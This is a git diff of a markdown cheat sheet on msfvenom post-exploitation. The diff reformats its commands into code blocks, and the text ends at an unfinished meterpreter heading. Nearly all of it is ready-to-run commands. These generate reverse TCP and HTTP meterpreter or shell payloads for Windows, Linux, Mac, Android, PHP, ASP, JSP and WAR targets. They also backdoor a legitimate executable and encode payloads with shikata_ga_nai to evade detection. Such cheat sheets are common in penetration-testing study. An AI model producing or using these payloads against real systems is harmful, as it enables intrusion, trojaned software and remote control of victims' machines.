diff --git a/post_exploitation/msfvenom.md b/post_exploitation/msfvenom.md index 0d8f585..879bdb2 100644 --- a/post_exploitation/msfvenom.md +++ b/post_exploitation/msfvenom.md @@ -2,39 +2,81 @@ MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. -## Creting Binaries -- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` - - Creates a simple TCP Payload for Windows -- `msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` - - Creates a simple HTTP Payload for Windows -- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf` - - Creates a simple TCP Shell for Linux -- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho` - - Creates a simple TCP Shell for Mac -- `msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk` - - Creates a simple TCP Payload for Android +## Creating Binaries +The following create different binaries for meterpreter and reverse TCP shells: + +### Creates a Reverse TCP Meterpreter Shell - Payload for Windows + +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe +``` + +### Creates a simple HTTP Payload for Windows +``` +msfvenom -p windows/meterpreter/reverse_http LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe +``` + +### Creates a simple TCP Shell for Linux +``` +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f elf > payload.elf +``` + +### Creates a simple TCP Shell for Mac + +``` +msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > example.macho +``` + +### Creates a simple TCP Payload for Android + +``` +msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk` +``` ## Web Payloads -Command Info -- `msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php` - - Creates a Simple TCP Shell for PHP -- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp` - - Creates a Simple TCP Shell for ASP -- `msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp` - - Creates a Simple TCP Shell for Javascript -- `msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war` - - Creates a Simple TCP Shell for WAR + +### Creates a Simple TCP Shell for PHP +``` +msfvenom -p php/meterpreter_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.php +``` + +### Creates a Simple TCP Shell for ASP +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f asp > example.asp +``` + +### Creates a Simple TCP Shell for Javascrip +``` +msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.jsp +``` + +### Creates a Simple TCP Shell for WAR + +``` +msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f war > example.war +``` ## Windows Payloads -- `msfvenom -l encoders` - - Lists all avalaible encoders -- `msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` - - Binds an exe with a Payload (Backdoors an exe) -- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe` - - Creates a simple TCP payload with shikata_ga_nai encoder -- `msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe` - - Binds an exe with a Payload and encodes it +### Lists all avalaible encoder +``` +msfvenom -l encoders +``` + +### Binds an exe with a Payload (Backdoors an exe) +``` +msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe +``` + +### Creates a simple TCP payload with shikata_ga_nai encoder +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe +``` + +### Binds an exe with a Payload and encodes it +``` +msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe +``` ## Getting a Metepreter Shell ```